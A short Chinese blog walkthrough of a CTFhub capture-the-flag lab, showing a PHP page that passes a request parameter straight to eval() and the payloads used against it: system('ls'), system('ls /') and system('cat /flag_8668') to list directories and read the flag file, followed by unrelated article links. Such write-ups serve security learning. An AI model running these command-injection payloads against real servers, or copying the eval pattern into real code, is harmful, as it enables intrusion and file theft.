CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
XiYang-DING3 分钟前
jQuery
前端·javascript·jquery
Morwit3 分钟前
【力扣hot100】 221. 最大正方形
前端·算法·leetcode
Javatutouhouduan6 分钟前
大厂Java岗最新面试真题汇总!
java·java面试·后端开发·java编程·java程序员·互联网大厂·java八股文
逻辑驱动的ken6 分钟前
Java高频面试考点场景题23
java·开发语言·数据库·面试·职场和发展·哈希算法
xxjj998a14 分钟前
PHP vs Java:核心区别与应用场景全解析
java·开发语言·php
明月_清风14 分钟前
关于node 模块化的现状与未来
前端·node.js
老王以为22 分钟前
从源码到架构:React useActionState 深度剖析
前端·javascript·react.js
前端超有趣23 分钟前
详解JavaScript中encodeURIComponent和decodeURIComponent的使用(附实战场景)
前端·javascript
用户2986985301429 分钟前
Java 从零生成 Word 文档:段落、图片与表格操作
java·后端
2401_8332693030 分钟前
Java IO流:从字节到字符的桥梁
java·开发语言
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南08CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录09几个好用的ip纯净度检测网站102026年AI前瞻:量子AI、具身智能与科学发现的新纪元